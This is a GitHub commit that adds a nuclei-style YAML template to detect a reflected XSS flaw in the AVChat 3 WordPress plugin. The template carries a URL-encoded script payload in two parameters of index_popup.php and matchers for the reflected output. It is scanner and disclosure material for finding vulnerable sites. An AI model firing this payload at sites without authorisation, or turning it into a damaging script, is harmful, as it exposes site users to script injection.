Merge pull request #5004 from projectdiscovery/wp-avchat-3-xss

Create wp-avchat-3-xss.yaml
patch-1
Prince Chaddha 2022-08-05 07:57:58 +04:00 committed by GitHub
commit 3ef2eea48f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: avchat-video-chat-xss
info:
name: AVChat Video Chat 1.4.1 - index_popup.php Multiple Parameters Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The Community Lite Video Chat WordPress plugin was affected by an index_popup.php Multiple Parameters Reflected XSS security vulnerability.
reference:
- https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
- https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
metadata:
verified: true
tags: wordpress,wp-plugin,xss,,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value="FB_appId"><script>alert(document.domain)</script>"'
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200